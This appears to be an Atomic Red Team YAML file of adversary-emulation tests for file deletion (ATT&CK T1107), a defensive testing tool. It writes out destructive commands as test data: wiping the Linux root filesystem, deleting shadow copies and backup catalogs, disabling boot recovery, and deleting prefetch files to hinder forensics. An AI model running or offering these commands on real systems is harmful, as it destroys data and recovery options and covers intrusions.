security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
1663bf7d524b6fc8a9a39104feb2949b36368dfc
atomic-red-team/atomics/T1107/T1107.yaml
T
JB 29a2fa0539 Added test for deletion of prefetch files (anti-forensic technique) (#564) 
Details:  Adding a new atomic for support on 1107, Delete a single prefetch file.  Deletion of prefetch files is a known anti-forensic technique.  An earlier version of this was drafted by Carrie Roberts (@clr2of8 )

Testing: atomic was tested with success by another jb on Windows 10, powershell with elevated privileges

Associated Issues: will also update the .md page; no issues known
2019-09-16 09:08:43 -06:00

183 lines
4.8 KiB
YAML
Raw Blame History

---
attack_technique: T1107
display_name: File Deletion
atomic_tests:
- name: Delete a single file - Linux/macOS
description: |
Delete a single file from the temporary directory
supported_platforms:
- linux
- macos
input_arguments:
file_to_delete:
description: Path of file to delete
type: Path
default: /tmp/victim-files/a
executor:
name: sh
command: |
rm -f #{file_to_delete}
- name: Delete an entire folder - Linux/macOS
description: |
Recursively delete the temporary directory and all files contained within it
supported_platforms:
- linux
- macos
input_arguments:
folder_to_delete:
description: Path of folder to delete
type: Path
default: /tmp/victim-files
executor:
name: sh
command: |
rm -rf #{folder_to_delete}
- name: Overwrite and delete a file with shred
description: |
Use the `shred` command to overwrite the temporary file and then delete it
supported_platforms:
- linux
input_arguments:
file_to_shred:
description: Path of file to shred
type: Path
default: /tmp/victim-shred.txt
executor:
name: sh
command: |
shred -u #{file_to_shred}
- name: Delete a single file - Windows cmd
description: |
Delete a single file from the temporary directory using cmd.exe
supported_platforms:
- windows
input_arguments:
file_to_delete:
description: Path of file to delete
type: Path
default: C:\Windows\Temp\victim-files-cmd\a
executor:
name: command_prompt
elevation_required: false
command: |
del /f #{file_to_delete}
- name: Delete an entire folder - Windows cmd
description: |
Recursively delete the temporary directory and all files contained within it using cmd.exe
supported_platforms:
- windows
input_arguments:
folder_to_delete:
description: Path of folder to delete
type: Path
default: C:\Windows\Temp\victim-files-cmd
executor:
name: command_prompt
elevation_required: false
command: |
del /f /S #{folder_to_delete}
- name: Delete a single file - Windows PowerShell
description: |
Delete a single file from the temporary directory using Powershell
supported_platforms:
- windows
input_arguments:
file_to_delete:
description: Path of file to delete
type: Path
default: C:\Windows\Temp\victim-files-ps\a
executor:
name: powershell
elevation_required: false
command: |
Remove-Item -path "#{file_to_delete}"
- name: Delete an entire folder - Windows PowerShell
description: |
Recursively delete the temporary directory and all files contained within it using Powershell
supported_platforms:
- windows
input_arguments:
folder_to_delete:
description: Path of folder to delete
type: Path
default: C:\Windows\Temp\victim-files-ps
executor:
name: powershell
elevation_required: false
command: |
Remove-Item -path "#{folder_to_delete}" -recurse
- name: Delete VSS - vssadmin
description: |
Delete all volume shadow copies with vssadmin.exe
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: |
vssadmin.exe Delete Shadows /All /Quiet
- name: Delete VSS - wmic
description: |
Delete all volume shadow copies with wmic
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: |
wmic shadowcopy delete
- name: bcdedit
description: |
This test leverages `bcdedit` to remove boot-time recovery measures.
supported_platforms:
- windows
executor:
name: command_prompt
command: |
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
- name: wbadmin
description: |
This test deletes Windows Backup catalogs.
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: |
wbadmin delete catalog -quiet
- name: Delete Filesystem - Linux
description: |
This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.
supported_platforms:
- linux
- centos
- ubuntu
executor:
name: bash
command: |
rm -rf / --no-preserve-root > /dev/null 2> /dev/null
- name: Delete-PrefetchFile
description: |
Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique.
supported_platforms:
- windows
executor:
name: powershell
elevation_required: true
command: |
Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0])
Reference in New Issue View Git Blame Copy Permalink